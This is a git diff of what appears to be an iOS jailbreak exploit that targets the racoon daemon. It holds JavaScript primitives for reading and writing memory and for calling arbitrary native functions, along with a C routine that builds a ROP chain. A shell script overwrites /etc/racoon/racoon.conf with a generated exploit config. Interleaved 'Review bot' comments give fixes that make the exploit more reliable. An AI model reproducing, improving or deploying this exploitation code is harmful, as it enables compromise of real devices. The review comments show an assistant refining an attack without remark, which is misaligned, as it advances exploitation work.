-rw-r--r--.gitignore4
-rwxr-xr-xbuild.sh5
-rwxr-xr-xinstall_native.sh14
-rw-r--r--js/call.js11
-rw-r--r--js/main.js15
-rw-r--r--js/mem.js8
-rw-r--r--old_exp.conf1
-rw-r--r--src/main.c4
-rw-r--r--src/stage2.c24
9 files changed, 68 insertions, 18 deletions
diff --git a/.gitignore b/.gitignore
index e587f6c..94d6152 100644
--- a/.gitignore
+++ b/.gitignore
@@ -11,4 +11,6 @@ usedbins/*
exp.js
*/exp.js
-**/exp.js \ No newline at end of file
+**/exp.js
+
+racoon.conf
diff --git a/build.sh b/build.sh
index 03fbe43..3bd3809 100755
--- a/build.sh
+++ b/build.sh
@@ -16,7 +16,8 @@ clang -I $(pwd)/inc/ \
-o bin/main \
-D__WHOAMI__="\"$(whoami)\"" \
-D__PWD__="\"$(pwd)\"" \
- -g
+ -g
+# -rdynamic
# build armv7 (for untether install)
xcrun -sdk iphoneos clang -arch armv7 src/main.c \
@@ -32,4 +33,4 @@ xcrun -sdk iphoneos clang -arch armv7 src/main.c \
-framework JavaScriptCore \
-g
-ldid -Sent.xml bin/main_arm \ No newline at end of file
+ldid -Sent.xml bin/main_arm
diff --git a/install_native.sh b/install_native.sh
new file mode 100755
index 0000000..325515a
--- /dev/null
+++ b/install_native.sh
@@ -0,0 +1,14 @@
+#!/bin/bash
+
+#ssh root@localhost -p 2222 "rm main_arm"
+
+#scp -P 2222 bin/main_arm root@localhost:main_arm
+#scp -P 2222 exp.js root@localhost:exp.js
+
+bin/main_arm -f /usr/sbin/racoon -j exp.js -o racoon.conf
+cp racoon.conf /etc/racoon/racoon.conf
+
+#bin/main -f ~/racoon -j ../lol.js | ssh root@localhost -p 2222 "cat > /etc/racoon/racoon.conf"
+
+#bin/main -f ~/racoon | ssh root@192.168.1.6 "cat > racoon.conf"
+#bin/main -f ~/racoon | ssh root@192.168.1.6 "cat > /etc/racoon/racoon.conf"
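Review bot: The two live commands on lines 58–59 run with no error check, so if `bin/main_arm` fails or produces no output, `cp` still installs whatever stale `racoon.conf` happens to be in the working directory over /etc/racoon/racoon.conf — and a leftover from an earlier run is likely now that the file is gitignored. Add `set -e` under the shebang, or chain the two steps so the install only happens on success: `bin/main_arm -f /usr/sbin/racoon -j exp.js -o racoon.conf && cp racoon.conf /etc/racoon/racoon.conf`. The system config is also overwritten in place with no backup; a `cp /etc/racoon/racoon.conf /etc/racoon/racoon.conf.bak` beforehand would make recovery possible if the generated config breaks the daemon (how racoon is restarted is not shown here). The commented-out ssh/scp lines with a fixed host and port are dead code and should be removed rather than carried along.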
diff --git a/js/call.js b/js/call.js
index 382222c..8c5ad44 100644
--- a/js/call.js
+++ b/js/call.js
@@ -2,6 +2,7 @@ var reserve_addr = 0x1a0000;
var gettimeofday_addy = 0x34d63d3c;
var slide = 0x0;
var base = 0x0;
+//var slid = 0x0;
function get_dyld_shc_slide() {
return read_u32((slide << 12) + reserve_addr + 20);
@@ -45,3 +46,13 @@ function call4arg(addy, r0, r1, r2, r3) {
return (parseInt(Int64.fromDouble(ret)) & 0xffffffff) >>> 0;
}
+
+/*
+ * call with symbol
+ */
+function calls4arg(sym, r0, r1, r2, r3) {
+ var dlsym_addy = read_u32(0x1a0000 + 24 + slid);
+ var shc_slide = read_u32(0x1a0000 + 20 + slid);
+ var addy = call4arg(dlsym_addy + shc_slide, 0xfffffffe, sptr(sym), 0, 0);
+ return call4arg(addy, r0, r1, r2, r3);
+}
diff --git a/js/main.js b/js/main.js
index efb1f5f..b75af4e 100644
--- a/js/main.js
+++ b/js/main.js
@@ -24,6 +24,10 @@ function main() {
slide = get_our_slide();
base = 0x4000 + (slide << 12);
slid = (slide << 12);
+// write_u32(0x144444, slid);
+// return;
+// call(slide);
+// while(true){;;};
// call(0x41424344);
log("slide=0x" + slide.toString(16));
@@ -31,6 +35,7 @@ function main() {
log("*(uint16_t*)base = 0x" + read_u16(base).toString(16));
log("*(uint32_t*)base = 0x" + read_u32(base).toString(16));
+
write_u32(0x144444, 0x69691337);
log("writing to first mapped loc");
@@ -49,7 +54,9 @@ function main() {
var dlsym_addy = read_u32(0x1a0000 + 24 + slid);
var shc_slide = read_u32(0x1a0000 + 20 + slid);
- write_str(0x148000, "get rekt from jsc %d (slide=%x)\0");
+// write_u32(0x144444, dlsym_addy);
+// return;
+ write_str(0x148000, "get rekt from jsc %d (slide=%x)\n\0");
write_str(0x149000, "syslog\0");
write_str(0x14a000, "sleep\0");
// while (true) {
@@ -59,8 +66,10 @@ function main() {
var i = 0;
while (true) {
- call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
- call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
+// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
+// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
+ calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0);
+ calls4arg("sleep", 1, 0, 0, 0);
i++;
// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3);
}
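Review bot: The format string still says `(slide=%x)` but the fourth argument changed from `slide` to `0`, so every syslog line now reports slide=0 while `i` is the only meaningful value — either pass `slide` again or drop the conversion. Both `calls4arg("syslog\0", …)` and the inline `sptr("get rekt …")` allocate from the bump region on every iteration of an infinite loop, and nothing ever resets `global_sptr_addy`, so the cursor walks upward from 0x150000 without bound (one sleep(1) per iteration, but still no limit). Hoist the format string and restore the slide argument: `var fmt = sptr("get rekt from jsc %d (slide=%x)\n\0");` before the loop, then `calls4arg("syslog\0", 0x28, fmt, i, slide);` inside it; the per-call symbol-string allocation lives in `calls4arg` and needs fixing there. The now-unused writes to 0x148000/0x149000/0x14a000 above this hunk can go as well. `main` starts and ends outside this hunk.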
diff --git a/js/mem.js b/js/mem.js
index c342707..cfa6698 100644
--- a/js/mem.js
+++ b/js/mem.js
@@ -145,3 +145,11 @@ function write_str(addy, s) {
return s;
}
+
+var global_sptr_addy = 0x150000;
+
+function sptr(s) {
+ write_str(global_sptr_addy, s);
+ global_sptr_addy += s.length;
+ return global_sptr_addy - s.length;
+}
diff --git a/old_exp.conf b/old_exp.conf
new file mode 100644
index 0000000..9bf2c20
--- /dev/null
+++ b/old_exp.conf
@@ -0,0 +1 @@
+execute("/usr/sbin/racoon");
diff --git a/src/main.c b/src/main.c
index c3e4077..124affa 100644
--- a/src/main.c
+++ b/src/main.c
@@ -334,7 +334,7 @@ int main(int argc,
"var parent = new Uint8Array(0x100);"
"var child = new Uint8Array(0x100);"
" var fuck = new Array();"
- " for (var i = 0; i < 0x200000; i++) {"
+ " for (var i = 0; i < 0x10000; i++) {"
" fuck[i] = i;"
" }"
" delete fuck;"
@@ -343,7 +343,7 @@ int main(int argc,
strlen("var parent = new Uint8Array(0x100);"
"var child = new Uint8Array(0x100);"
" var fuck = new Array();"
- " for (var i = 0; i < 0x200000; i++) {"
+ " for (var i = 0; i < 0x10000; i++) {"
" fuck[i] = i;"
" }"
" delete fuck;"
diff --git a/src/stage2.c b/src/stage2.c
index 4297e79..8b98a7e 100644
--- a/src/stage2.c
+++ b/src/stage2.c
@@ -230,6 +230,10 @@ uintptr_t get_dyld_shc_sym_addr(char* sym) {
return dlsym(RTLD_DEFAULT, sym) - get_dyld_shc_slide();
}
+uintptr_t get_dyld_shc_sym_addr_jsc(char* sym) {
+ return dlsym(dlopen("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore", RTLD_LAZY) , sym) - get_dyld_shc_slide();
+}
+
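Review bot: `get_dyld_shc_sym_addr_jsc` never checks the result of `dlopen` or `dlsym`, so a failed load or an unknown symbol yields `NULL - slide`, which is pointer arithmetic on a `void*` that silently produces a bogus address baked into the ROP chain. It also re-opens the framework on every call (five times in the next hunk), incrementing the handle's refcount each time with no `dlclose`. Cache the handle once and fail loudly on either error; the file already uses `fprintf(stderr, …)` for diagnostics.

```c
uintptr_t get_dyld_shc_sym_addr_jsc(char* sym) {
    static void* jsc = NULL;
    if (jsc == NULL) {
        jsc = dlopen("/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore", RTLD_LAZY);
        if (jsc == NULL) {
            fprintf(stderr, "dlopen(JavaScriptCore) failed: %s\n", dlerror());
            abort();
        }
    }
    void* p = dlsym(jsc, sym);
    if (p == NULL) {
        fprintf(stderr, "dlsym(%s) failed: %s\n", sym, dlerror());
        abort();
    }
    return (uintptr_t)p - get_dyld_shc_slide();
}
```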
rop_chain_shit gen_rop_chain(uint32_t base,
uint32_t we_out_here_addr,
uint32_t mov_r0,
@@ -305,11 +309,11 @@ rop_chain_shit gen_rop_chain(uint32_t base,
// uint32_t slid_b0i = 0x2b14000;
- uint32_t JSContextGroupCreate = get_dyld_shc_sym_addr("JSContextGroupCreate");
- uint32_t JSGlobalContextCreateInGroup = get_dyld_shc_sym_addr("JSGlobalContextCreateInGroup");
- uint32_t JSContextGetGlobalObject = get_dyld_shc_sym_addr("JSContextGetGlobalObject");
- uint32_t JSStringCreateWithUTF8CString = get_dyld_shc_sym_addr("JSStringCreateWithUTF8CString");
- uint32_t JSEvaluateScript = get_dyld_shc_sym_addr("JSEvaluateScript");
+ uint32_t JSContextGroupCreate = get_dyld_shc_sym_addr_jsc("JSContextGroupCreate");
+ uint32_t JSGlobalContextCreateInGroup = get_dyld_shc_sym_addr_jsc("JSGlobalContextCreateInGroup");
+ uint32_t JSContextGetGlobalObject = get_dyld_shc_sym_addr_jsc("JSContextGetGlobalObject");
+ uint32_t JSStringCreateWithUTF8CString = get_dyld_shc_sym_addr_jsc("JSStringCreateWithUTF8CString");
+ uint32_t JSEvaluateScript = get_dyld_shc_sym_addr_jsc("JSEvaluateScript");
uint32_t dlsym_ = get_dyld_shc_sym_addr("dlsym");
MOV_R0(dlsym_);
@@ -317,7 +321,7 @@ rop_chain_shit gen_rop_chain(uint32_t base,
// uint32_t settimeofday = get_dyld_shc_sym_addr("settimeofday");
-// fprintf(stderr, "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", JSContextGroupCreate, JSGlobalContextCreateInGroup, JSContextGetGlobalObject, JSStringCreateWithUTF8CString, JSEvaluateScript, stime);
+ fprintf(stderr, "0x%08x 0x%08x 0x%08x 0x%08x 0x%08x 0x%08x\n", JSContextGroupCreate, JSGlobalContextCreateInGroup, JSContextGetGlobalObject, JSStringCreateWithUTF8CString, JSEvaluateScript, dlsym_);
/*
MOV_R0(0);
@@ -384,9 +388,9 @@ rop_chain_shit gen_rop_chain(uint32_t base,
MOV_R1_R0();
PRINT_STILL_HERE();
-// DEREF_IN_R0(0x144444);
-// MOV_R1_R0();
-// CALL_1ARG(base + printf_addr, base + dyld_shc_base_status);
+ DEREF_IN_R0(0x144444);
+ MOV_R1_R0();
+ CALL_1ARG(base + printf_addr, base + dyld_shc_base_status);
// CALL_1ARG(base + printf_addr, 0x109000);
@@ -397,4 +401,4 @@ rop_chain_shit gen_rop_chain(uint32_t base,
chain_b0i->chain_len = chain_len * 4;
return chain_b0i;
-} \ No newline at end of file
+}